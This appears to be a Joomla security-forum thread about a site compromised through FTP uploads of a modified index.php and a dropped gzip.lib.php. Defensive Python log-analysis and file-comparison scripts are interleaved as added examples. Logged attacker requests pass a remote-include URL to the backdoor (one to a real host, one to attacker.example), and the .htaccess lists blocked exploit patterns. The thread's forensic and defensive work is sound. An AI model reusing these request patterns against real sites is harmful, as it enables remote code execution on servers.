Attacked by replacing index.php and inserting gzip.lib.php

Discussion regarding Joomla! 1.5 security issues.
Joomla! Vulnerable Extensions: http://feeds.joomla.org/JoomlaSecurityV ... Extensions

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Attacked by replacing index.php and inserting gzip.lib.php

Post by RysiuM » Sun Nov 07, 2010 4:28 am

This is exactly the same attack described in the post http://forum.joomla.org/viewtopic.php?f=432&t=418523. What is significant is that both sites I manage have been attacked from the same IP at the same time. The first site has been live for 2 years already, but the first attack was in July this year:

The FTP log looks like that:


Thu Jul 22 10:25:53 2010 0 213.5.68.141 10786 ....../templates/template/index.php a _ o r xxx ftp 1 * c
Thu Jul 22 10:25:53 2010 0 213.5.68.141 10832 ....../templates/template/index.php a _ i r xxx ftp 1 * c
Thu Jul 22 10:25:55 2010 0 213.5.68.141 10786 ....../templates/template/index.php a _ i r xxx ftp 1 * c
Thu Jul 22 10:25:56 2010 0 213.5.68.141 29463 ....../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c
In August I put the second site live, and now in October the same attack went to both websites (from the same IP). The second attack happened the same day, a few hours apart.

Both sites are running Joomla 1.5.9, almost vanilla, on the same hosting. Do you have any idea how that FTP access happened? Hard to believe that the guy broke two passwords for two sites. I wonder if it is something to be addressed by me or by my host.

Both sites have been fixed (I am doing backups) and passwords were changed, IP blocked, but I wonder what the original backdoor for that attack was.
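
The FTP entries above are in the xferlog format most Unix FTP daemons write, and the tell is in the direction field: the client pulled the template's index.php (o, outgoing), pushed a copy of a different size back two seconds later (i, incoming), then uploaded a file under administrator/includes/pcl/ that had never been downloaded first. The script below is an added example, not code from this thread or from Joomla; it parses that format and flags both patterns. Its log lines are constructed to mirror the post's, with a placeholder path prefix, user name and TEST-NET addresses.

```python
"""Flag the download-modify-upload pattern in an xferlog-format FTP log.

Added example; it is not code from the forum thread. The sample lines are
constructed to mirror the post's entries: the client pulls a template's
index.php (direction 'o', outgoing), pushes a different-sized copy back
seconds later (direction 'i', incoming), then uploads a new .php file under
administrator/includes/pcl/. The path prefix /home/example/public_html,
the user name 'webuser' and the TEST-NET addresses are placeholders.
"""
from datetime import datetime
from typing import Dict, List, NamedTuple, Tuple

SAMPLE_XFERLOG = """\
Thu Jul 22 10:25:53 2010 0 198.51.100.7 10786 /home/example/public_html/templates/template/index.php a _ o r webuser ftp 1 * c
Thu Jul 22 10:25:53 2010 0 198.51.100.7 10832 /home/example/public_html/templates/template/index.php a _ i r webuser ftp 1 * c
Thu Jul 22 10:25:55 2010 0 198.51.100.7 10786 /home/example/public_html/templates/template/index.php a _ i r webuser ftp 1 * c
Thu Jul 22 10:25:56 2010 0 198.51.100.7 29463 /home/example/public_html/administrator/includes/pcl/gzip.lib.php a _ i r webuser ftp 1 * c
Thu Jul 22 14:02:10 2010 1 203.0.113.9 4096 /home/example/public_html/images/logo.png b _ i r webuser ftp 1 * c
"""


class Transfer(NamedTuple):
    when: datetime
    host: str
    size: int
    path: str
    direction: str  # 'o' = sent to the client (download), 'i' = received from it (upload)
    user: str
    status: str     # 'c' = completed, 'i' = incomplete


def parse_xferlog(text: str) -> List[Transfer]:
    """Parse xferlog lines (wu-ftpd / ProFTPD / Pure-FTPd layout).

    Field order: 5-token timestamp, transfer-time, remote-host, file-size,
    filename, transfer-type, special-action-flag, direction, access-mode,
    username, service-name, authentication-method, authenticated-user-id,
    completion-status.  The filename is taken from the middle so that
    names containing spaces survive.
    """
    records = []
    for line in text.splitlines():
        tokens = line.split()
        if len(tokens) < 18:          # 8 leading tokens + filename + 9 trailing tokens
            continue
        when = datetime.strptime(" ".join(tokens[:5]), "%a %b %d %H:%M:%S %Y")
        host, size = tokens[6], int(tokens[7])
        path = " ".join(tokens[8:-9])
        direction, user, status = tokens[-7], tokens[-5], tokens[-1]
        records.append(Transfer(when, host, size, path, direction, user, status))
    return records


def find_tampering(records: List[Transfer], window_seconds: int = 300) -> List[Dict]:
    """Report completed uploads that look like tampering.

    'modify'  : the same host downloaded the same path within the window and
                is now uploading to it (fetch, inject, push back).
    'new-php' : a .php file is uploaded with no prior download of that path
                in the log, i.e. a file that did not exist before.
    """
    findings: List[Dict] = []
    last_download: Dict[Tuple[str, str], Transfer] = {}
    for rec in records:
        if rec.status != "c":
            continue
        key = (rec.host, rec.path)
        if rec.direction == "o":
            last_download[key] = rec
            continue
        if rec.direction != "i":
            continue
        prior = last_download.get(key)
        if prior is not None and (rec.when - prior.when).total_seconds() <= window_seconds:
            findings.append({"kind": "modify", "host": rec.host, "path": rec.path,
                             "size_before": prior.size, "size_after": rec.size,
                             "when": rec.when.isoformat()})
        elif prior is None and rec.path.lower().endswith(".php"):
            findings.append({"kind": "new-php", "host": rec.host, "path": rec.path,
                             "size": rec.size, "when": rec.when.isoformat()})
    return findings


def hosts_uploading_code(records: List[Transfer]) -> List[str]:
    """Every remote host that completed an upload of a .php file."""
    return sorted({r.host for r in records
                   if r.direction == "i" and r.status == "c" and r.path.lower().endswith(".php")})


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    for finding in find_tampering(recs):
        print(finding)
    print("hosts that uploaded PHP:", hosts_uploading_code(recs))
```

Run over a real xferlog, the 'modify' pairs tell you which files to diff against a clean copy and the 'new-php' entries which files to remove outright. The window defaults to five minutes because the real sequence took three seconds; widen it if the tool you are chasing is slower.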

 
tastrax
Joomla! Ace
Posts: 1874
Joined: Tue Sep 20, 2005 12:36 pm
Location: Tasmania

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by tastrax » Sun Nov 07, 2010 5:03 am

no idea on the backdoor but take a few minutes to update to 1.5.22.
http://declarationoffreedom.com - Declaration of freedom - you are free..
http://www.kiva.org - Kiva - loans that change lives

Updated to 2.5.3

leolam
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Sun Nov 07, 2010 5:10 am

As Tastrax mentions, your Joomla sites are completely outdated and you need an urgent upgrade. (Releases on 1.5 are at present done only for security reasons and/or severe bugs. All new features are added to 1.6 or later.) You run very vulnerable sites and you need not only to check your Joomla and upgrade but also the vulnerable extension list (see beginning of the security forum). Most often these backdoors and FTP hacks are caused by something on your own PC..... read and act: http://forum.joomla.org/viewtopic.php?f=432&t=411735

Leo 8)
Joomla's #1 Professional Services Provider:
#Joomla Professional Support: https://gws-desk.com -
#Joomla Specialized Hosting Solutions: https://gws-host.com -
#Joomla Webmaster Services: gws-webmaster.services

Lightme
Joomla! Intern
Posts: 61
Joined: Fri Jun 15, 2007 10:54 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Lightme » Sun Nov 07, 2010 5:36 am

I also recommend doing a search on this website/forum on how to protect and properly configure your .htaccess file.

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 6:02 am

Thank you for the prompt response.
The upgrade will take much more than a few minutes (at least on one site) as I have fixed "mod_M17n" a lot (so it actually works) and that mod has a few changes to the base PHP code. There are other changes I have made (I'm glad I documented them well) that will make the update a PITA. What will probably happen is that I will have to do a manual update by applying the changes either way.

There are no "add-ons" except
modules:
- mod_M17n (only second site)
- mod_articlelist (only second site)

plugins:
- Simple Image Gallery Plugin - (Version 1.2.1 (released on January 6th, 2007))
- AllVideos (by JoomlaWorks) - (Last update: August 10th, 2008 - version 2.5.3)
- System - Multilingual (M17n) - (fixed by me to work properly with home page) - (only second site)
- Button - Xmap Link - (only second site)
- System - Tag Meta (Version 1.2) - (only second site)

So as you see, they are not fancy at all, and the only add-ons installed on both sites are Simple Image Gallery and AllVideos.

Of course I went through all security recommendations (except the upgrade, which I see as the only thing I can add to my "to-do list").

What I suspect is that the "ftp" was from some "tool", not a human action (identical entries in the FTP log), and the changes on my site were identical and limited to these two files (if someone knew my password, I would imagine my sites would be quite different by now).

If this can help to find out what is wrong, here is the full extract from the raw log of access to my second site from that IP address:
FTP log:
==========
Mon Oct 25 04:55:05 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ o r xxx ftp 1 * c
Mon Oct 25 04:55:06 2010 0 213.5.68.141 11076 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:07 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:08 2010 0 213.5.68.141 29463 ..../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c


Raw access log:
================
213.5.68.141 - - [25/Oct/2010:04:46:41 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:00 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:04 -0500] "HEAD ///templates/template2/index.php HTTP/1.1" 404 - "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:06 -0500] "GET / HTTP/1.0" 200 15290 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 404 - "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 200 - "-" "-"

...

213.5.68.141 - - [26/Oct/2010:05:35:32 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?check_script HTTP/1.0" 200 34 "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:33 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?include_update=http://safebotslogs.net/StatC/Stat.php HTTP/1.0" 200 42 "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:34 -0500] "HEAD / HTTP/1.1" 200 - "-" "-"
213.5.68.141 - - [26/Oct/2010:05:35:36 -0500] "GET /?look HTTP/1.0" 200 15278 "-" "-"
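
Read next to the FTP log, the access log above shows the attacker's verification steps: a HEAD on the target that answers 404 and then 200 once the upload lands, the home page fetched before and after the template upload with a different byte count, and the next day two GET requests that drive the new file through its query string, one of them handing it a remote URL. The script below is an added example, not code from this thread or from Joomla; it parses combined-format lines, normalises the slash-stuffed paths, and flags each of those signals. Its sample lines are constructed to mirror the post's, with TEST-NET client addresses and 'attacker.example' as placeholders, and its list of include-only directories is an assumption about a stock Joomla 1.5 tree.

```python
"""Pick the backdoor's traffic out of an Apache combined-format access log.

Added example; it is not code from the forum thread. The sample lines are
constructed to mirror the post's log: a HEAD probe that turns from 404 into
200 while the FTP upload is happening, and, a day later, GET requests to the
new file carrying 'check_script' and 'include_update=<remote URL>' in the
query string. The client addresses (TEST-NET ranges) and the host
'attacker.example' are placeholders. The list of include-only directories
is an assumption about a stock Joomla 1.5 tree.
"""
import re
from collections import Counter
from datetime import datetime
from typing import Dict, List, NamedTuple
from urllib.parse import parse_qsl

SAMPLE_ACCESS_LOG = """\
198.51.100.7 - - [25/Oct/2010:04:55:00 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
198.51.100.7 - - [25/Oct/2010:04:55:04 -0500] "HEAD ///templates/template2/index.php HTTP/1.1" 404 - "-" "-"
198.51.100.7 - - [25/Oct/2010:04:55:06 -0500] "GET / HTTP/1.0" 200 15290 "-" "-"
198.51.100.7 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 404 - "-" "-"
198.51.100.7 - - [25/Oct/2010:04:55:09 -0500] "HEAD ///administrator/includes/pcl//gzip.lib.php HTTP/1.1" 200 - "-" "-"
198.51.100.7 - - [26/Oct/2010:05:35:32 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?check_script HTTP/1.0" 200 34 "-" "-"
198.51.100.7 - - [26/Oct/2010:05:35:33 -0500] "GET ///administrator/includes/pcl//gzip.lib.php?include_update=http://attacker.example/StatC/Stat.php HTTP/1.0" 200 42 "-" "-"
203.0.113.5 - - [26/Oct/2010:09:12:01 -0500] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 18320 "http://www.example.org/" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Directories whose .php files are only ever include()d by the front
# controllers, never requested by a browser (assumption for a stock Joomla 1.5).
INCLUDE_ONLY_PREFIXES = ("/administrator/includes/", "/includes/", "/libraries/")


class Hit(NamedTuple):
    when: datetime
    ip: str
    method: str
    path: str    # repeated slashes collapsed, query string removed
    query: str
    status: int
    size: int    # -1 where Apache logged "-" (HEAD responses)


def parse_access_log(text: str) -> List[Hit]:
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path, _, query = m["target"].partition("?")
        # '///a//b.php' and '/a/b.php' are the same file on disk; normalise
        # before matching so slash-stuffing does not slip past the rules.
        path = re.sub(r"/{2,}", "/", raw_path)
        size = -1 if m["size"] == "-" else int(m["size"])
        hits.append(Hit(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
                        m["ip"], m["method"], path, query, int(m["status"]), size))
    return hits


def analyse(hits: List[Hit], window_seconds: int = 60) -> List[Dict]:
    findings: List[Dict] = []
    previous: Dict[tuple, Hit] = {}   # (ip, path, query) -> last hit on that URL
    for h in hits:
        key = (h.ip, h.path, h.query)
        prev = previous.get(key)
        if prev is not None and (h.when - prev.when).total_seconds() <= window_seconds:
            if prev.status == 404 and h.status == 200:
                # The URL did not exist a moment ago and now does: the client
                # is confirming that its upload landed.
                findings.append({"kind": "probe-then-present", "ip": h.ip,
                                 "path": h.path, "when": h.when.isoformat()})
            elif (prev.status == h.status == 200 and -1 not in (prev.size, h.size)
                  and prev.size != h.size):
                # Same page, seconds apart, different length: consistent with
                # checking an injected change.  Dynamic pages vary on their
                # own, so treat this as corroboration, not proof.
                findings.append({"kind": "response-size-changed", "ip": h.ip,
                                 "path": h.path, "before": prev.size, "after": h.size})
        previous[key] = h
        # A parameter whose value is itself a URL tells the script to fetch
        # remote code: the control channel of an uploaded loader.
        for name, value in parse_qsl(h.query, keep_blank_values=True):
            if re.match(r"^(https?|ftp)://", value, re.I):
                findings.append({"kind": "remote-url-param", "ip": h.ip,
                                 "path": h.path, "param": name, "url": value})
    # Served (200) requests for .php files that should never be entry points,
    # aggregated per client and file.
    served = Counter((h.ip, h.path) for h in hits
                     if h.status == 200 and h.path.lower().endswith(".php")
                     and h.path.startswith(INCLUDE_ONLY_PREFIXES))
    for (ip, path), count in sorted(served.items()):
        findings.append({"kind": "include-path-served", "ip": ip, "path": path, "hits": count})
    return findings


if __name__ == "__main__":
    for finding in analyse(parse_access_log(SAMPLE_ACCESS_LOG)):
        print(finding)
```

The 'remote-url-param' and 'include-path-served' findings are the ones that identify the dropped file and the address it was told to fetch from; 'probe-then-present' dates the upload to the second, which is what you line up against the FTP log. Note that the pre-upload HEAD on the template's index.php also returned 404 in the post even though that file existed, so a 404 alone proves nothing about what is on disk.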

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Sun Nov 07, 2010 12:59 pm

FIRST YOU CAN NOT UPDATE/UPGRADE!! Simply doing an upgrade or package update to the latest version will not get rid of the issue on either site as files such as gzip.lib.php will not be replaced by the update. The files that have been placed on your site will remain and continue to be active.

You MUST REMOVE/Delete all files from the site and then upload a full install of the latest Joomla. Only by deleting all files from the sites can you be sure the hack files are gone.

Here are guides to help:

http://docs.joomla.org/Security_Checklist_7

http://docs.joomla.org/Vulnerable_Extensions_List

Forum post assistant:

http://forum.joomla.org/download/file.php?id=66336
PhilD -- Unrequested PM's and/or emails may not get a response.
Security Moderator

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 6:13 pm

This is the output:
JTS-post Diagnostic Information wrote:Joomla! Version: Joomla! 1.5.9 Production/Stable [ Vatani ] 9-January-2009 23:00 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-164.el5PAE ( i686) | Web Server: Apache | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): Yes | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 60 seconds | File Uploads: Enabled
MySQL Version: 5.0.51a-community-log ( Localhost via UNIX socket )
JTS-post Extended Information wrote:SEF: Enabled (with ReWrite) | Legacy Mode: Disabled | FTP Layer: Disabled | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi-fcgi | MySQLi: Yes | Max. Memory: 256M | Max. Upload Size: 12M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.51a ( latin1 )
The list of extensions has been verified against the Vulnerable_Extensions_List (the report shows all base Joomla and add-ons I have listed before).
Sites have been recovered and checked against any changes - the only thing that was done during the attack was the two files listed earlier (I have multiple full backups from day one). All raw logs show that the only activity from that attacking IP was these entries listed above (I have full raw logs since day one). It looks like there were three HTTP requests just before the FTP invasion:


213.5.68.141 - - [25/Oct/2010:04:46:41 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:00 -0500] "GET / HTTP/1.0" 200 15244 "-" "-"
213.5.68.141 - - [25/Oct/2010:04:55:04 -0500] "HEAD ///templates/template2/index.php HTTP/1.1" 404 - "-" "-"
I don't know if any information was returned that shouldn't have been. I don't know where to look for clues. Here is the .htaccess in case it is the one to blame:
IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti*
Options +FollowSymLinks
RewriteEngine On

########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode crap to send via URL
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Send all blocked request to homepage with 403 Forbidden error!
RewriteRule ^(.*)$ index.php [F,L]
#
########## End - Rewrite rules to block out some common ex

RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_URI} !^/index.php
RewriteCond %{REQUEST_URI} (/|\.php|\.html|\.htm|\.feed|\.pdf|\.raw|/[^.]*)$ [NC]
RewriteRule (.*) index.php
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]

<Limit GET POST>
#The next line modified by DenyIP
order allow,deny
#The next line modified by DenyIP
#deny from all
allow from all
</Limit>

<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>

AuthUserFile "....../.htpasswds/public_html/passwd"

<Files .htaccess>
order allow,deny
deny from all
</Files>

<FilesMatch "configuration.php">
Order allow,deny
Deny from all
</FilesMatch>

<Files 403.shtml>
order allow,deny
allow from all
</Files>

deny from 150.70.84.
AuthName "........."
deny from 213.5.68.141

mandville
Joomla! Master
Posts: 14970
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by mandville » Sun Nov 07, 2010 6:18 pm

Some notes.
Apart from the obvious out-of-date Joomla you have,
the .htaccess file will also be out of date, and you have FrontPage extensions installed.
All bad practices.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 9:03 pm

mandville wrote:some notes.
apart from the obvious out of date joomla you have.
the htaccess file will also be out of date, and you have front page extensions installed.
all bad practices/
1. I will upgrade Joomla - I need some time, but I will. This is out of question.
2. I suspect the .htaccess is not the best one - yesterday I tried to put in most of the stuff already suggested, but I got errors, so I need more work on that to see which entry is screwing up. Of course any suggestions for critical entries are welcome.
3. I have no clue about FrontPage extensions. What is that?

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Sun Nov 07, 2010 9:17 pm

@RysiuM
Have you deleted all files as previously advised ?
Have you installed the newest version of Joomla ?
Have you reinstalled the newest versions of the Extensions as previously advised ?
Have you checked the links as previously advised ?

Also have you checked all PC's/Mac's, that have access to your server, with every anti virus and anti malware program that you can ?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"The definition of insanity is doing the same thing over and over again, but expecting different results": Albert Einstein.

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Sun Nov 07, 2010 10:54 pm

Webdongle wrote:@RysiuM
Have you deleted all files as previously advised ?
yes
Webdongle wrote: Have you installed the newest version of Joomla ?
Not yet - it will take time as there is no "upgrade path 1.5.9 -> 1.5.22", but an installation from scratch and applying all customizations I have done to my current version. I understand that the new version is much safer, but does it plug the hole that "my attacker" has used?
Webdongle wrote: Have you reinstalled the newest versions of the Extensions as previously advised ?
Only two I use:
Simple Image Gallery Plugin - has no updates
AllVideos - the new version is listed as having security problems - no word about the old one I'm using
Webdongle wrote: Have you checked the links as previously advised ?
Yes, I did
Webdongle wrote: Also have you checked all PC's/Mac's, that have access to your server, with every anti virus and anti malware program that you can ?
Yes I have - came clean. I have Trend Micro installed for years.

At this point both websites are clean and running. The attacker's IP is blocked. The upgrade to 1.5.22 will take a while (won't happen overnight). I'm monitoring the sites (for that attack I know what to look for). I have all backups (this is why I could recover so fast).

What is bugging me is that nobody says anything (I have searched the Joomla forum and the web for possible answers) about what that attack is (it has happened to more people, not just me) and what hole the attack is using.

I wonder if anyone has a suggestion about what critical thing is missing (or wrong) in my .htaccess.

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Sun Nov 07, 2010 11:34 pm

If you deleted the files but did not replace them with files from the latest Joomla full installation zip, then what files did you put back on your site? Backup files that could be compromised?

Also, using just one anti-virus is not enough. Recently I had to use 8 anti-virus/anti-malware programs to get rid of a nasty virus on a friend's PC. Her 13-year-old grandson had been visiting a few suspect sites; he must have clicked 'allow' a lot of times. Point being, checking with one is never enough.
RysiuM wrote:but installation from scratch and applying all customizations I have done to my current version
Was it core files that you modified?


What are your site url's ?

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Mon Nov 08, 2010 12:02 am

Webdongle wrote:If you deleted the files but did not replace with files from the latest Joomla full installation zip then what files did you put back on your site ? Back up files that could be compromised ?
I had backups from day one. I have checked and compared (binary) all files from the website with the clean local backups. Only two files were changed/added in this attack. All other files are the same. If they are compromised, they would have been compromised in the original Joomla 1.5.9 installation package.
Webdongle wrote:Was it core files that you modified ?
What are your site url's ?
There are three types of modifications I did:

One site is easy - just publishing authority (I described it almost 2 years ago).
The second site is dual language, and that mod replaced some core files. What I found is that the mod has bugs and issues, so I fixed them in some places (menu item handling, home page handling). This is the most work to get to the new installation, but doable.
There are also plugins I have changed. It is easy to put them in the new version as plugins are independent and can be easily upgraded.

I am not sure if giving site names will break the rules of this forum.
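
The check described in this post, a byte-for-byte comparison of the live site against a clean backup, is worth scripting so it can be rerun after every incident and after every upgrade. The script below is an added example, not code from this thread or from Joomla; it hashes both trees with SHA-256 and reports added, modified and removed files, listing anything with an executable suffix first. The two directory trees it compares are placeholders it builds itself in a temporary directory, and its ignore list for cache and log directories is an assumption about what legitimately differs between a backup and a live copy.

```python
"""Compare a live web root against a known-clean backup, file by file.

Added example; it is not code from the forum thread. It does what the
poster describes, a binary comparison of every file against a clean
backup, using SHA-256 digests, and reports files that were added,
modified or removed, with anything the web server would execute listed
first. build_demo() writes two small placeholder trees into a temporary
directory so the script runs offline; on a real site point hash_tree()
at the backup and at the live document root instead.
"""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# Paths that legitimately differ between backup and live copy; extend per site.
IGNORE_PREFIXES = ("cache/", "administrator/cache/", "logs/", "tmp/")
# Files the server will execute if requested; these get looked at first.
EXECUTABLE_SUFFIXES = (".php", ".phtml", ".php5", ".inc", ".cgi", ".pl", ".sh")


def hash_tree(root: Path) -> Dict[str, str]:
    """Map each regular file (relative POSIX path) to the SHA-256 of its bytes.

    Contents are hashed rather than comparing size or mtime: a replaced file
    can be padded to the original size and timestamps can be reset with touch.
    """
    digests: Dict[str, str] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.is_symlink():
            continue
        rel = path.relative_to(root).as_posix()
        if rel.startswith(IGNORE_PREFIXES):
            continue
        h = hashlib.sha256()
        with path.open("rb") as fh:
            for chunk in iter(lambda: fh.read(1 << 16), b""):
                h.update(chunk)
        digests[rel] = h.hexdigest()
    return digests


def compare_trees(baseline: Dict[str, str], live: Dict[str, str]) -> Dict[str, List[str]]:
    """Classify every path as added (live only), removed (backup only) or modified."""
    common = set(baseline) & set(live)
    return {
        "added": sorted(set(live) - set(baseline)),
        "removed": sorted(set(baseline) - set(live)),
        "modified": sorted(p for p in common if baseline[p] != live[p]),
    }


def prioritise(report: Dict[str, List[str]]) -> List[str]:
    """Added or modified files with an executable suffix, the ones to read first."""
    return sorted(p for kind in ("added", "modified") for p in report[kind]
                  if p.lower().endswith(EXECUTABLE_SUFFIXES))


def build_demo() -> Tuple[Path, Path]:
    """Write a clean tree and a tampered copy of it (all placeholder content)."""
    base = Path(tempfile.mkdtemp(prefix="webroot-compare-"))
    backup, live = base / "backup", base / "live"
    clean = {
        "index.php": "<?php // front controller (placeholder)\n",
        "configuration.php": "<?php class JConfig { var $sitename = 'Example'; }\n",
        "htaccess.txt": "# shipped sample rewrite rules (placeholder)\n",
        "templates/template/index.php": "<html><body>template (placeholder)</body></html>\n",
        "administrator/includes/pcl/pclzip.lib.php": "<?php // zip library (placeholder)\n",
        "cache/page.cache": "cached output that is expected to differ\n",
    }
    tampered = dict(clean)
    # Mirror the incident: template index.php altered, a new .php dropped
    # next to the archive library, one shipped file gone, cache churned.
    tampered["templates/template/index.php"] += "<!-- constructed: stands in for injected markup -->\n"
    tampered["administrator/includes/pcl/gzip.lib.php"] = "<?php // constructed placeholder for the uploaded file\n"
    tampered["cache/page.cache"] = "different cached output\n"
    del tampered["htaccess.txt"]
    for root, files in ((backup, clean), (live, tampered)):
        for rel, content in files.items():
            target = root / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(content)
    return backup, live


if __name__ == "__main__":
    backup_dir, live_dir = build_demo()
    report = compare_trees(hash_tree(backup_dir), hash_tree(live_dir))
    for kind in ("added", "modified", "removed"):
        for rel in report[kind]:
            print(f"{kind:9} {rel}")
    print("look at first:", prioritise(report))
```

The comparison only proves what the poster says it proves: that the live tree matches the backup. If the backup itself was taken after an earlier compromise, both copies carry the same files and nothing shows up, which is why the stock release archive, not a site backup, is the right baseline for core files.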

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Mon Nov 08, 2010 12:29 am

PM me the url's if you like
RysiuM wrote:What I found, the mod has bugs and issues, so I fixed them in some places (menu items handling, home page handling)
mmmmmmmmm ... could that be where they got in ?

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Mon Nov 08, 2010 5:10 am

Webdongle wrote:mmmmmmmmm ... could that be where they got in ?
It is not on the first site, but still got hacked. PM sent

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Mon Nov 08, 2010 2:20 pm

Sent a full report of what I checked, but in summary:
Two domain names with one IP address.
One domain name showed two files with iframes.

Also a scan of the IP led to a link showing several mail servers etc. connected with the IP.

Conclusion
Either the IP has been hijacked or a PC is being controlled remotely with a Trojan (that is the easiest thing in the world to do if the victim thinks their computer is clean).
Bundling

Bundling is one of the most common ways parasites are spread. It works like this: you install a piece of software you think looks good, and it invites some of its friends onto your computer behind your back.

When you run any piece of software, remember that it has the capability to do anything you can do—up to and including deleting all your files. Only install software from authors you trust, and look out for the warning signs of untrustworthy authors.
http://www.doxdesk.com/parasite/prevention.html

